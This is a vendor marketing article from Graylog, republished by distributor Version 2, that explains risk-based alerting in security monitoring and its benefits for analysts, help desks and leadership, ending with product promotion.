Risk-based alerting (RBA) means that the detection logic incorporates additional attributes to reduce the overall number of alerts generated while enhancing them with meaningful data. 

When security analysts write these alerts, they may include security metadata including:

  • Exploitability, like an asset’s distance from the public internet
  • Impact, like users with privileged access
  • Likelihood, like incorporating threat intelligence
  • Asset criticality, like databases storing personally identifiable information (PII)

 

With RBA, security analysts can align their monitoring activities to the organization’s risk assessment more effectively. Further, when security teams have a solution that enables threat hunting, they can proactively use these enhanced rules to detect suspicious activity in their systems. 

What are the benefits of risk-based alerting?

While the frontend process of building risk-based detection rules can take some time, the overall benefits you get from them are worth it. 

Reduced Alert Fatigue

Alert fatigue is a real issue for anyone working in cybersecurity, and the problem has only gotten worse over the last few years. According to research, security teams are overwhelmed with inaccurate or unnecessary alerts, struggling to prioritize and review them effectively with:

  • 59% of respondents saying they receive more than 500 cloud security alerts per day
  • 43% saying more than 40% of their alerts are false positives
  • 56% saying they spend more than 20% of their day reviewing alerts and deciding which ones should be dealt with first
  • 55% saying that critical alerts are being missed

 

With risk-based alerting, you can correlate multiple events to generate fewer false positives. By reducing the overall number of alerts and making them more valuable, your security team can prioritize their responses better. 

 

Faster Investigation Times

With fewer alerts and better prioritization capabilities, your security team can investigate incidents faster. With more attributes added to the alert, the security team has a way to focus their investigations. For example, consider this risk-based alert that monitors for people who recently tendered their resignation who make changes to Active Directory:

By linking the organization’s HR information to its Active Directory, the security team has a way to monitor for a specific, high-risk use case more precisely. When the system generates the alert, they also have all the information necessary to investigate the root cause. 

Improved Security Metrics

Proving your security program’s effectiveness typically includes the following metrics:

  • Mean Time to Detect (MTTD)
  • Mean Time to Investigate (MTTI)
  • Mean Time to Contain (MTTC)
  • Mean Time to Recover or Mean Time to Remediate (MTTR)

 

With risk-based alerts, you reduce all of these times, ultimately improving the metrics. You can think of it like a chain reaction. With better detection, security teams work with better information and focus. With fewer overall alerts, analysts can investigate them faster. The faster they can find the incident’s root cause, the sooner they can contain the attacker, remediate the system, and get everything back online. 

Who benefits from risk-based alerts?

Even though risk-based alerts sit under the security function, various people across your organization benefit from them. 

Security Analysts

With better information, your security analysts can do their jobs more effectively and efficiently. Since they’re not spending as much time chasing down false alerts, they can focus their energy on high-impact activities like threat hunting. Further, when security analysts have the tools to do their job well, they’re more likely to stay with the company, reducing employee turnover. 

IT Help Desk

When something goes wrong in your environment, the help desk is the first place users turn. Often, security issues and operational issues mimic one another. For example, a Distributed Denial of Service (DDoS) attack slows down your network, but a network device configuration issue can have the same outcome. With security teams detecting and responding to incidents faster, your IT help desk gets fewer calls. 

Senior Leadership

Senior leadership is responsible for overseeing the organization’s compliance posture and making data-driven decisions about the cybersecurity program. Your risk assessment is the basis of your compliance program. With risk-based alerts, you can align your security and compliance objectives more effectively. Further, leadership needs to understand the program’s strengths and weaknesses to make meaningful decisions about security investments. When you map risk-based alerts to frameworks like MITRE ATT&CK, you gain visibility into potential tooling gaps.

Graylog Security: Risk-Based, High Fidelity Alerts to Mature Your Program

With Graylog Security, you can build risk-based, high fidelity alerts based on your organization’s unique technology stack and risk profile. Our cloud-native capabilities, intuitive UI, and out-of-the-box content enable you to build the security program you need without paying for the functionalities you don’t use. Using our prebuilt content, you gain immediate value from your logs wit search templates, dashboards, correlated alerts, dynamic lookup tables, and more. 

Built with end-users in mind, Graylog’s platform empowers people of all skill levels. You don’t need special skills or engineers to build the risk-based alerts so you can uplevel your security with your current team, reducing labor costs often associated with complex SIEMs. 

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.